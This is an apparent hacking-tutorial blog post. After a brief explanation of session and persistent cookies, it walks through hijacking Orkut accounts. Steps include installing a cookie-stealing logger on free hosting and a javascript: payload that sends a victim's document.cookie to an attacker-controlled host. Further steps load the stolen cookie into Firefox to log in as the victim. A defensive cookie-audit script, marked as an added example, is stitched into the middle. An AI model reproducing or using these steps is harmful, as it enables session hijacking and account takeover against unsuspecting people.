1] What are cookies?
A:- Cookies are text messages/files given to a web browser by a web server. The main purpose of a cookie is to identify users and possibly prepare customized web pages, or to save site login information for you. When you enter a web site that uses cookies, you may be asked to fill out a form providing information such as your name, email address, etc. This information is packaged into a cookie and sent to your web browser, which stores it for later use. The next time you go to the same web site, your browser will send the cookie to the web server. The message is then sent back to the server each time the browser requests a page from the server.

A web server has no memory, so the website you are visiting places a cookie file on your computer's hard disk, through the browser, so that the web site can remember who you are and your preferences. This message exchange allows the web server to use this information to present you with customized web pages.

Types of Cookies:

[a] Session cookie:
It is also called a transient cookie. It is a cookie that is erased when you close the web browser. The session cookie is stored in temporary memory and is not retained after the browser is closed. Session cookies do not collect information from your computer. They typically store information in the form of a session identifier that does not personally identify the user.

[b] Persistent cookie:
It is also called a permanent cookie or a stored cookie: a cookie that is stored on your hard drive until it expires (persistent cookies are set with expiration dates) or until you delete the cookie. Persistent cookies are used to collect identifying information about the user, such as web surfing behavior or user preferences for a specific web site.

How To Use Victim Cookies?

Cookies can be used to log in to another person's account without knowing his/her password.

First we need a Firefox add-on (cookie editor) to add these cookies to the browser.
Download the add-on here: https://addons.mozilla.org/en-US/firefox/addon/573

Install the add-on, then restart Firefox.

Now use the cookie stealing script, or a fake application with a cookie stealing script, to obtain the victim's cookies.

Go to Tools–>Cookies Editor —> select Add
http://www.orkut.co.in/AlbumZoom.aspx?uid=13758045739414020276&pid=1218191708969&aid=1

Fill Name : orkut_state

Contents : Fill in the cookies here

Host : .www.orkut.co.in

Then click save

Now hit Refresh. You will notice that you are logged in with the victim's ID.

2] How to use cookie monster?

Let's start and make the ultimate cookie exploit to hack Orkut.

1. Go to Lenhost.info and make a free hosting account.

2. It will mail you all the details, such as the FTP / MySQL username and password.

3. Download Install.php from here:

http://rapidshare.com/files/53318259/install.php

4. Upload this file to the server and run it.

5. It will open as an installer.

6. Fill in the columns:

Database : it's something like username_name

For this, go to MySQL and create a database there.

Password : your password

User : sent to you by mail

Table : give any name in this column

Server : this is found in MySQL

Admin Password : provide a password to access the admin area

Once you are done, select Submit.

7. The next page shows you some links at the end; take the 4th link.

8.javascript:document.location=’http://orkut.lenhost.info/getmonster.php?cookie=‘+encodeURIComponent(document.cookie);void(0)

Replace my link with yours in the above JavaScript.

9. Done. Send it to your victim; when the victim runs it, his cookies get stolen.

10. To receive the cookies, open the admin area http://name.lenhost.info/logmonster.php; it asks for the password. Log in with the password you provided during installation.
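
Seen from the defending site's side (an added example, not part of the original post): the script in step 8 can only send what `document.cookie` exposes, and a cookie set with the `HttpOnly` attribute is not exposed there. The sketch below audits `Set-Cookie` headers, classifies each cookie as session or persistent as in the types described earlier, and flags missing protective attributes; the function names and sample headers are constructed for illustration.

```javascript
// Added example: audit Set-Cookie headers for the cookie properties discussed on this page.
function auditSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = (parts[0] || '').indexOf('=');
  if (eq < 1) throw new Error('not a name=value cookie: ' + header);
  const name = parts[0].slice(0, eq);

  // Attribute names are case-insensitive; flags such as HttpOnly carry no value.
  const attrs = new Map();
  for (const part of parts.slice(1)) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs.set(key, i === -1 ? '' : part.slice(i + 1).trim());
  }

  // A cookie with Expires or Max-Age is persistent; without either it is a
  // session cookie that the browser drops when it closes.
  const persistent = attrs.has('max-age') || attrs.has('expires');
  const httpOnly = attrs.has('httponly');
  const findings = [];
  if (!httpOnly) findings.push('readable via document.cookie (no HttpOnly)');
  if (!attrs.has('secure')) findings.push('sent over plain HTTP (no Secure)');
  if (!attrs.has('samesite')) findings.push('no explicit SameSite policy');
  if (persistent && !httpOnly) findings.push('long-lived and script-readable');

  return {
    name,
    kind: persistent ? 'persistent' : 'session',
    scriptReadable: !httpOnly,
    findings,
  };
}

// Constructed sample headers (not captured from any real site).
const SAMPLE_HEADERS = [
  'session_id=abc123; Path=/',
  'session_id=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'remember_me=xyz789; Max-Age=2592000; Path=/; Secure',
];

function auditAll(headers) {
  return headers.map(auditSetCookie);
}

for (const r of auditAll(SAMPLE_HEADERS)) {
  console.log(`${r.name} [${r.kind}] ${r.findings.join('; ') || 'ok'}`);
}
```

A login cookie that passes this audit with no findings is still a bearer token, so server-side session expiry and invalidation on logout remain necessary.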


Note:- You can use either cookie monster or any cookie stealing script to obtain cookies. For more information, please refer to the following topics:

http://www.orkut.co.in/CommMsgs.aspx?cmm=43323325&tid=5212232745554622947
http://www.orkut.co.in/CommMsgs.aspx?cmm=43323325&tid=2587081189494761589
http://www.orkut.co.in/CommMsgs.aspx?cmm=43323325&tid=5228584562328151586

Enjoyeeeeee 🙂

Kuntal (Sr. System Administrator)
